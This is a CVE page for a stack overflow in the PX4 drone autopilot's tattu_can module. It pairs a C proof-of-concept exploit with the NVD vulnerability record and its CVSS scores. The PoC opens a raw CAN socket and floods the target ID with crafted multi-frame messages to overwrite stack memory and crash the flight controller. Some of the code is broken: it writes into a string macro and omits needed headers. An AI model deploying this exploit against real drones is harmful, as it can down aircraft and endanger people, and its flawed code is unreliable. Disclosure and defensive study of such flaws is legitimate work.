CVE-2026-32707

// CVE-2026-32707 PoC - CAN Frame Injection for PX4 tattu_can Stack Overflow // This PoC demonstrates sending malformed multi-frame CAN messages // to trigger unbounded memcpy in tattu_can module #include <stdio.h> #include <stdlib.h> #include <string.h> #include <linux/can.h> #include <linux/can/raw.h> #include <net/if.h> #include <sys/socket.h> #define CAN_INTERFACE "can0" #define TATTU_CAN_ID 0x100 #define MALICIOUS_PAYLOAD_SIZE 256 // Exceeds stack buffer size int create_can_socket(const char *interface) { int sock = socket(PF_CAN, SOCK_RAW, CAN_RAW); if (sock < 0) { perror("Socket creation failed"); return -1; } struct ifreq ifr; strcpy(ifr.ifr_name, interface); ioctl(sock, SIOCGIFINDEX, &ifr); struct sockaddr_can addr; addr.can_family = AF_CAN; addr.can_ifindex = ifr.ifr_ifindex; if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) { perror("Bind failed"); return -1; } return sock; } void send_malicious_multi_frame(int sock) { // First frame (FF) - indicates multi-frame message struct can_frame ff_frame; ff_frame.can_id = TATTU_CAN_ID | CAN_EFF_FLAG; ff_frame.can_dlc = 8; ff_frame.data[0] = 0x10; // First Frame Indicator + DLC memset(&ff_frame.data[1], 0x41, 7); // Padding // Send First Frame write(sock, &ff_frame, sizeof(struct can_frame)); // Consecutive frames with oversized payload for (int i = 0; i < 20; i++) { struct can_frame cf_frame; cf_frame.can_id = TATTU_CAN_ID | CAN_EFF_FLAG; cf_frame.can_dlc = 8; cf_frame.data[0] = 0x20 | (i & 0x0F); // Consecutive Frame + Sequence // Fill with pattern to overflow stack buffer memset(&cf_frame.data[1], 0x41, 7); write(sock, &cf_frame, sizeof(struct can_frame)); usleep(1000); // Small delay between frames } printf("[+] Malicious multi-frame CAN messages sent\n"); printf("[+] Target: %s, ID: 0x%x\n", CAN_INTERFACE, TATTU_CAN_ID); } int main(int argc, char *argv[]) { if (argc > 1) { strncpy(CAN_INTERFACE, argv[1], IFNAMSIZ-1); } printf("[*] CVE-2026-32707 PoC - PX4 tattu_can Stack Overflow\n"); printf("[*] Target: PX4 Autopilot < 1.17.0-rc2\n"); int sock = create_can_socket(CAN_INTERFACE); if (sock < 0) { fprintf(stderr, "[-] Failed to create CAN socket\n"); return 1; } send_malicious_multi_frame(sock); close(sock); return 0; }

{"cve": {"id": "CVE-2026-32707", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:41.783", "lastModified": "2026-03-17T16:16:23.027", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "PX4 autopilot is a flight control solution for drones. Prior to 1.17.0-rc2, tattu_can contains an unbounded memcpy in its multi-frame assembly loop, allowing stack memory overwrite when crafted CAN frames are processed. In deployments where tattu_can is enabled and running, a CAN-injection-capable attacker can trigger a crash (DoS) and memory corruption. This vulnerability is fixed in 1.17.0-rc2."}, {"lang": "es", "value": "El piloto automático PX4 es una solución de control de vuelo para drones. Antes de la versión 1.17.0-rc2, tattu_can contiene un memcpy sin límites en su bucle de ensamblaje de múltiples tramas, lo que permite la sobrescritura de memoria de pila cuando se procesan tramas CAN manipuladas. En implementaciones donde tattu_can está habilitado y en ejecución, un atacante capaz de inyectar CAN puede provocar un fallo (DoS) y corrupción de memoria. Esta vulnerabilidad está corregida en la versión 1.17.0-rc2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "baseScore": 5.2, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.17.0", "matchCriteriaId": "2FC2D6F1-D77D-44C2-A99C-55CB5A4474B9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "033A0A82-2986-44D5-A712-47B8D43407FF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "3F2EA96E-BC3A-42AB-B81B-53D5872B2296"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "1EAC5320-8D94-477D-AB85-144F8218DDFB"}]}]}], "references": [{"url": "https://github.com/PX4/PX4-Autopilot/security/advisories/GHSA-wxwm-xmx9-hr32", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/PX4/PX4-Autopilot/security/advisories/GHSA-wxwm-xmx9-hr32", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}